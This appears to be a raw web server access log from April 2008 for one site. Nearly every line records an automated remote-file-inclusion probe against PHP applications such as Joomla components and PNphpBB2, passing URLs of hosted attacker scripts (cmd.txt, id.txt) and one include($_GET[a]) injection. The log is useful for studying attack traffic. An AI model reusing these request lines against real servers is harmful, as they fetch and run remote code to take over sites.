209.25.195.66 - - [23/Apr/2008:11:13:33 -0700] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:33 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:34 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:37 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:37 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:38 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:40 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:11:13:40 -0700] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:40 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:11:13:44 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:54 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:59 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [23/Apr/2008:11:14:01 -0700] "GET //common/db.php?commonpath=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:14:04 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:14:04 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:11:14:12 -0700] "GET /logs/access_080218.log//components/com_simpleboard/image_upload.php?sbp=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:14:43 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:14:44 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:14:48 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:14:48 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:14:54 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [23/Apr/2008:11:14:56 -0700] "GET //db.php?commonpath=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:15:04 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:15:04 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:11:15:23 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:11:15:24 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:15:47 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:15:52 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:15:53 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:15:53 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:16:25 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:18:24 -0700] "GET /logs/access_080227.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.244.161.55 - - [23/Apr/2008:11:18:27 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:11:18:49 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:11:18:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:11:18:51 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.143.120.21 - - [23/Apr/2008:11:19:37 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:19:37 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:19:37 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:19:37 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.143.120.21 - - [23/Apr/2008:11:19:39 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:19:41 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.223.191 - - [23/Apr/2008:11:19:54 -0700] "GET /logs/index.php?option=com_installer&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.215.223.191 - - [23/Apr/2008:11:19:55 -0700] "GET /index.php?option=com_installer&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:11:20:01 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:11:20:02 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:20:17 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:20:29 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:20:29 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:20:29 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:20:29 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:20:29 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:20:29 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:11:20:35 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:11:20:37 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:11:20:38 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [23/Apr/2008:11:20:38 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:21:00 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:21:01 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:21:22 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:21:22 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:21:22 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:21:42 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
99.238.107.156 - - [23/Apr/2008:11:22:20 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
99.238.107.156 - - [23/Apr/2008:11:22:25 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
99.238.107.156 - - [23/Apr/2008:11:22:25 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
84.244.161.55 - - [23/Apr/2008:11:22:38 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
84.244.161.55 - - [23/Apr/2008:11:22:38 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
91.121.115.49 - - [23/Apr/2008:11:23:15 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:11:23:36 -0700] "GET /phphtml.php?htmlclass_path=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:23:43 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:23:43 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:11:23:45 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:11:23:45 -0700] "GET /phphtml.php?htmlclass_path=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:11:23:46 -0700] "GET /logs/phphtml.php?htmlclass_path=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:23:48 -0700] "GET /logs/access_080201.log/old_reports.php?file=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:23:48 -0700] "GET /old_reports.php?file=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:23:49 -0700] "GET /logs/old_reports.php?file=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:11:23:49 -0700] "GET /logs/access_080223.log/old_reports.php?file=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:11:24:11 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:11:24:12 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:11:24:12 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:11:24:40 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:11:25:29 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:11:25:45 -0700] "GET /logs/access_080218.log//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:11:25:49 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:11:25:49 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:11:25:49 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.53.51.242 - - [23/Apr/2008:11:25:51 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:25:54 -0700] "GET /logs/access_080308.log//mcf.php?content=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:25:55 -0700] "GET /logs//mcf.php?content=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:11:26:02 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/????? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:11:26:20 -0700] "GET /addpost_newpoll.php?addpoll=preview&thispath=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:11:26:20 -0700] "GET /logs/addpost_newpoll.php?addpoll=preview&thispath=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
99.238.107.156 - - [23/Apr/2008:11:26:24 -0700] "GET /logs/access_080329.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
99.238.107.156 - - [23/Apr/2008:11:26:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
99.238.107.156 - - [23/Apr/2008:11:26:25 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
87.253.132.5 - - [23/Apr/2008:11:26:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
87.253.132.5 - - [23/Apr/2008:11:26:27 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:26:28 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:26:29 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.253.132.5 - - [23/Apr/2008:11:26:44 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
87.253.132.5 - - [23/Apr/2008:11:26:46 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
82.165.229.152 - - [23/Apr/2008:11:27:26 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.165.229.152 - - [23/Apr/2008:11:27:38 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.6.21.58 - - [23/Apr/2008:11:27:40 -0700] "GET /logs/access_070925.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:28:11 -0700] "GET /logs/access_080219.log//mcf.php?content=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.95.221.212 - - [23/Apr/2008:11:28:11 -0700] "GET /logs/access_080207.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.114.53.153 - - [23/Apr/2008:11:28:26 -0700] "GET /logs/access_071224.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.95.221.212 - - [23/Apr/2008:11:28:28 -0700] "GET /logs/access_071122.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:11:28:28 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
